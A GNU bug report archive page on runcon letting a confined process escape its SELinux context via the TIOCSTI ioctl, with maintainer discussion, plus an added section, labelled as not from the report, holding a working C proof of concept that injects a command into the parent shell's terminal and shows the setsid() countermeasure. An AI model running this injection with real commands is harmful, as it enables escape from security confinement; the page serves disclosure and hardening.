GNU bug report logs -
#24541
runcon tty hijacking via TIOCSTI ioctl
Reported by: up201407890 <at> alunos.dcc.fc.up.pt
Date: Sun, 25 Sep 2016 15:58:02 UTC
Severity: normal
Done: Paul Eggert <eggert <at> cs.ucla.edu>
Bug is archived. No further changes may be made.
Quoting "Paul Eggert" <eggert <at> cs.ucla.edu>:
Hello,
I set the bug report here before I got a response from Paul Moore
https://marc.info/?l=selinux&m=147481004710264&w=2
"I don't think we need to fix this for runcon, as it isn't a
sandboxing tool like sandbox, and the loss of job control would likely
be much more noticeable for runcon."
> up201407890 <at> alunos.dcc.fc.up.pt wrote re <http://bugs.gnu.org/24541>:
>> When executing a program via the runcon utility, the nonpriv session
>> can escape to the parent session by using the TIOCSTI ioctl to push
>> characters into the terminal's input buffer, allowing an attacker to
>> execute arbitrary commands without the SELinux security context.
>
> Thanks for the bug report. Surely this is a bug in the setexeccon
> system call, not in the runcon command that uses the system call.
> That being said, perhaps runcon should work around the bug via
> something like the attached patch.
>
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
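The escape described in the report, as an added example that is not part of the bug report, of Paul Eggert's attached patch, or of coreutils. It shows the TIOCSTI injection itself (each byte pushed into the terminal's input queue is later read by whatever process next reads the tty, here the parent shell, in that shell's security context) next to the usual countermeasure of calling setsid() so the child has no controlling terminal, after which the kernel refuses TIOCSTI on the inherited tty fd with EPERM unless the caller has CAP_SYS_ADMIN. That countermeasure is the one sandbox-style tools use; it is not what runcon does, and it costs the job control Paul Moore refers to above. Function names (tiocsti_inject, drop_controlling_tty) and the echo payload are this example's own.

```c
/* Added example (not from the bug report or coreutils): TIOCSTI injection
 * into the controlling terminal, and the setsid() countermeasure.
 * Function names are this example's own, not runcon's. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Push each byte of `cmd` into the input queue of the terminal behind `fd`,
 * as if the user had typed it. Returns 0 on success, -errno on failure.
 * The kernel allows this only when `fd` is the caller's controlling tty
 * (or the caller has CAP_SYS_ADMIN); otherwise the ioctl fails with EPERM.
 * A non-tty fd (pipe, regular file) fails with ENOTTY, a bad fd with EBADF. */
int tiocsti_inject(int fd, const char *cmd)
{
    for (const char *p = cmd; *p; p++) {
        if (ioctl(fd, TIOCSTI, p) < 0)
            return -errno;
    }
    return 0;
}

/* Hardening: start a new session so the process has no controlling tty.
 * Afterwards TIOCSTI on any inherited terminal fd is refused (EPERM), at
 * the cost of job control for the new session. Returns 0 or -errno. */
int drop_controlling_tty(void)
{
    if (setsid() == (pid_t)-1)
        return -errno;
    return 0;
}

/* Attempt the injection from a child process before and after detaching,
 * and report what the kernel does in each case. */
static void demo(int fd, const char *payload)
{
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return;
    }
    if (pid == 0) {
        int rc = tiocsti_inject(fd, payload);
        fprintf(stderr, "attached child:  inject -> %s\n",
                rc ? strerror(-rc) : "accepted");
        rc = drop_controlling_tty();   /* forked child is not a group leader, so this succeeds */
        if (rc)
            fprintf(stderr, "setsid: %s\n", strerror(-rc));
        rc = tiocsti_inject(fd, payload);
        fprintf(stderr, "detached child:  inject -> %s\n",
                rc ? strerror(-rc) : "accepted");
        _exit(0);
    }
    waitpid(pid, NULL, 0);
}

int main(void)
{
    if (!isatty(STDIN_FILENO)) {
        fprintf(stderr, "stdin is not a terminal; nothing to inject into\n");
        return 1;
    }
    /* The accepted line sits in the tty input queue until this program
     * exits, then the parent shell reads and runs it: the escape the
     * report describes. The payload here is a harmless echo. */
    demo(STDIN_FILENO, "echo injected-by-TIOCSTI\n");
    return 0;
}
```

Run it from an interactive shell to see the first attempt accepted and the second refused with "Operation not permitted". Two caveats for anyone evaluating this today: setsid() detaches the child from the terminal's job control, which is exactly the regression Paul Moore expects users of runcon to notice; and Linux 6.2 and later can disable the ioctl outright via the dev.tty.legacy_tiocsti sysctl (CONFIG_LEGACY_TIOCSTI), in which case even the first attempt fails, so a check for the sysctl is a cheaper mitigation than changing runcon where the kernel is new enough.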
This bug report was last modified 7 years and 270 days ago.
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson.